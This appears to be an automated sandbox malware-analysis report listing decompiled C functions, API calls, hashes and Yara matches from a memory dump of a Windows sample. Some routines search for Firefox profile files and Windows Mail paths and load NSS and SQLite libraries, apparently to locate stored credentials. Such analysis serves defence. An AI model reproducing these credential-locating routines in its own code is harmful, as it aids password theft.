                                                                                  • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$memsetstrcatstrcpy
                                                                                • String ID: sqlite3.dll
                                                                                • API String ID: 1581230619-1155512374
                                                                                • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                                                • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004098F4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409018(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405EFD(_a4,  &_v516);
			}











                                                                                0x0040990e
                                                                                0x00409910
                                                                                0x00409917
                                                                                0x00409926
                                                                                0x0040992d
                                                                                0x00409939
                                                                                0x0040993d
                                                                                0x00409943
                                                                                0x00409957
                                                                                0x00409971

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00409917
                                                                                • memset.MSVCRT ref: 0040992D
                                                                                  • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                  • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                • sprintf.MSVCRT ref: 00409957
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                • String ID: </%s>
                                                                                • API String ID: 3202206310-259020660
                                                                                • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                                • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406734, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406734(char* __edi, char* _a4) {
				char* _t12;
				int _t13;

				_t12 = __edi;
				_t13 = strlen(__edi);
				if(strlen(_a4) + _t13 < 0x104) {
					_t2 =  &_a4; // 0x410d64
					strcat(_t13 + __edi,  *_t2);
				}
				return _t12;
			}





                                                                                0x00406734
                                                                                0x0040673f
                                                                                0x0040674f
                                                                                0x00406751
                                                                                0x00406758
                                                                                0x0040675e
                                                                                0x00406762

                                                                                APIs
                                                                                • strlen.MSVCRT ref: 00406736
                                                                                • strlen.MSVCRT ref: 00406741
                                                                                • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$strcat
                                                                                • String ID: dA
                                                                                • API String ID: 2335785903-82490789
                                                                                • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                                                • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E004078FF(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041158E();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

















                                                                                0x00402221
                                                                                0x00402225
                                                                                0x0040222b
                                                                                0x0040222f
                                                                                0x00402231
                                                                                0x00402234
                                                                                0x00402312
                                                                                0x00402315
                                                                                0x00000000
                                                                                0x004023c2
                                                                                0x0040231b
                                                                                0x0040231c
                                                                                0x00000000
                                                                                0x004023ba
                                                                                0x00402322
                                                                                0x00402323
                                                                                0x00000000
                                                                                0x004023b2
                                                                                0x00402329
                                                                                0x0040232a
                                                                                0x00402349
                                                                                0x00402352
                                                                                0x00402366
                                                                                0x0040237a
                                                                                0x0040238e
                                                                                0x004023a2
                                                                                0x0040228e
                                                                                0x00000000
                                                                                0x0040228e
                                                                                0x004023a8
                                                                                0x00402395
                                                                                0x00402395
                                                                                0x00402395
                                                                                0x00402381
                                                                                0x00402381
                                                                                0x00402381
                                                                                0x0040236d
                                                                                0x0040236d
                                                                                0x0040236d
                                                                                0x00000000
                                                                                0x00402359
                                                                                0x00402359
                                                                                0x004022b7
                                                                                0x00000000
                                                                                0x004022b7
                                                                                0x00402352
                                                                                0x0040232c
                                                                                0x0040232d
                                                                                0x00000000
                                                                                0x00402341
                                                                                0x00402330
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402336
                                                                                0x0040227e
                                                                                0x00402280
                                                                                0x00402282
                                                                                0x00402284
                                                                                0x00402285
                                                                                0x00402286
                                                                                0x0040228b
                                                                                0x00000000
                                                                                0x00402280
                                                                                0x0040223a
                                                                                0x0040230a
                                                                                0x00000000
                                                                                0x0040230a
                                                                                0x00402243
                                                                                0x004022d5
                                                                                0x004022fa
                                                                                0x00000000
                                                                                0x004022ff
                                                                                0x0040224b
                                                                                0x00000000
                                                                                0x004022c1
                                                                                0x00402250
                                                                                0x004022b1
                                                                                0x00000000
                                                                                0x004022b1
                                                                                0x00402255
                                                                                0x00000000
                                                                                0x004022a0
                                                                                0x0040225a
                                                                                0x00000000
                                                                                0x00402295
                                                                                0x0040225f
                                                                                0x00402278
                                                                                0x00000000
                                                                                0x00402278
                                                                                0x00402264
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040226d
                                                                                0x00402274
                                                                                0x0040226f
                                                                                0x0040226f
                                                                                0x0040226f
                                                                                0x00402271
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _ultoasprintf
                                                                                • String ID: %s %s %s
                                                                                • API String ID: 432394123-3850900253
                                                                                • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                                                • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D37A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				intOrPtr* _t43;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t43 = __ecx;
				E00406E68( &_v1300, __eflags, "*.*", _a4);
				while(E00406EC3( &_v1300) != 0) {
					__eflags = E00406E2D( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L004115B2();
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E0040614B( &_v652);
								if(__eflags != 0) {
									E0040D1EC(_t43, __eflags,  &_v652);
								}
							}
						}
					} else {
						_a8 = _a8 + 1;
						E0040D37A(_t43, __eflags,  &_v652, _a8);
					}
				}
				E00406F5B( &_v1300);
				return 1;
			}











                                                                                0x0040d386
                                                                                0x0040d391
                                                                                0x0040d395
                                                                                0x0040d39c
                                                                                0x0040d3ac
                                                                                0x0040d3ae
                                                                                0x0040d418
                                                                                0x0040d3be
                                                                                0x0040d3c0
                                                                                0x0040d3d9
                                                                                0x0040d3dd
                                                                                0x0040d3df
                                                                                0x0040d3e6
                                                                                0x0040d3eb
                                                                                0x0040d3ec
                                                                                0x0040d3f1
                                                                                0x0040d3f5
                                                                                0x0040d404
                                                                                0x0040d407
                                                                                0x0040d413
                                                                                0x0040d413
                                                                                0x0040d407
                                                                                0x0040d3f5
                                                                                0x0040d3c2
                                                                                0x0040d3c2
                                                                                0x0040d3d2
                                                                                0x0040d3d2
                                                                                0x0040d3c0
                                                                                0x0040d429
                                                                                0x0040d435

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$FileFindFirst
                                                                                • String ID: *.*$prefs.js
                                                                                • API String ID: 2516927864-1592826420
                                                                                • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                                                • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406680, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}



















                                                                                0x00406680
                                                                                0x00406680
                                                                                0x00406680
                                                                                0x00406688
                                                                                0x0040668b
                                                                                0x0040668d
                                                                                0x0040668d
                                                                                0x0040668f
                                                                                0x00406693
                                                                                0x00406697
                                                                                0x0040669b
                                                                                0x004066a1
                                                                                0x004066a7
                                                                                0x004066aa
                                                                                0x004066b4
                                                                                0x004066bb
                                                                                0x004066be
                                                                                0x004066c1
                                                                                0x004066c8
                                                                                0x004066d7
                                                                                0x004066f5
                                                                                0x004066d9
                                                                                0x004066db
                                                                                0x004066e0
                                                                                0x004066e0
                                                                                0x004066e6
                                                                                0x004066f1
                                                                                0x004066f1

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileNameSavestrcpy
                                                                                • String ID: L
                                                                                • API String ID: 1182090483-2909332022
                                                                                • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                                                • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040ADB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040ADB3(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x41300c;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				return E0040143D( &_v3660);
			}











                                                                                0x0040adb3
                                                                                0x0040adc9
                                                                                0x0040add3
                                                                                0x0040ade7
                                                                                0x0040adee
                                                                                0x0040adf5
                                                                                0x0040adfc
                                                                                0x0040ae03
                                                                                0x0040ae1e
                                                                                0x0040ae2d
                                                                                0x0040ae4a
                                                                                0x0040ae4a
                                                                                0x0040ae5b
                                                                                0x0040ae6f

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040ADD3
                                                                                • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                                  • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FocusMessagePostmemset
                                                                                • String ID: l
                                                                                • API String ID: 3436799508-2517025534
                                                                                • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                                • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408441, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}












                                                                                0x00408441
                                                                                0x00408449
                                                                                0x0040844e
                                                                                0x0040845a
                                                                                0x00408465
                                                                                0x00408467
                                                                                0x00408469
                                                                                0x0040846d
                                                                                0x00408471
                                                                                0x00408481
                                                                                0x00408488
                                                                                0x00408490
                                                                                0x00408496
                                                                                0x00408499
                                                                                0x0040849d
                                                                                0x0040849d
                                                                                0x004084a1
                                                                                0x004084a2
                                                                                0x00408467
                                                                                0x00408465
                                                                                0x004084aa

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSendmemset
                                                                                • String ID: "
                                                                                • API String ID: 568519121-123907689
                                                                                • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                                • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406618, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x413008;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}















                                                                                0x0040661e
                                                                                0x00406624
                                                                                0x00406629
                                                                                0x0040662c
                                                                                0x0040662f
                                                                                0x00406635
                                                                                0x0040663c
                                                                                0x00406643
                                                                                0x0040664a
                                                                                0x0040664d
                                                                                0x00406654
                                                                                0x0040665b
                                                                                0x0040666a
                                                                                0x0040667f
                                                                                0x0040666c
                                                                                0x00406670
                                                                                0x0040667b
                                                                                0x0040667b

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileNameOpenstrcpy
                                                                                • String ID: L
                                                                                • API String ID: 812585365-2909332022
                                                                                • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                                                • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407BB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadMenuA.USER32 ref: 00407BC1
                                                                                • sprintf.MSVCRT ref: 00407BE4
                                                                                  • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                                                  • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                                                  • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                                                  • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                                                  • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                                                  • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                                                  • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                • String ID: menu_%d
                                                                                • API String ID: 3671758413-2417748251
                                                                                • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                                                • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406325, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406325(char* _a4) {

				if( *0x417550 == 0) {
					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
				}
				strcpy(_a4, 0x417550);
				return  *0x417658;
			}



                                                                                0x00406332
                                                                                0x00406340
                                                                                0x00406340
                                                                                0x0040634a
                                                                                0x00406357

                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DirectoryWindowsstrcpy
                                                                                • String ID: PuA
                                                                                • API String ID: 531766897-3228437271
                                                                                • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                                                • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408348, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00408348(char* __esi) {
				char* _t2;
				char* _t6;

				_t6 = __esi;
				E00406160(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				return strcat(_t6, "_lng.ini");
			}





                                                                                0x00408348
                                                                                0x00408349
                                                                                0x00408351
                                                                                0x0040835b
                                                                                0x0040835d
                                                                                0x0040835d
                                                                                0x0040836d

                                                                                APIs
                                                                                  • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                                                • strrchr.MSVCRT ref: 00408351
                                                                                • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleNamestrcatstrrchr
                                                                                • String ID: _lng.ini
                                                                                • API String ID: 3097366151-1948609170
                                                                                • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
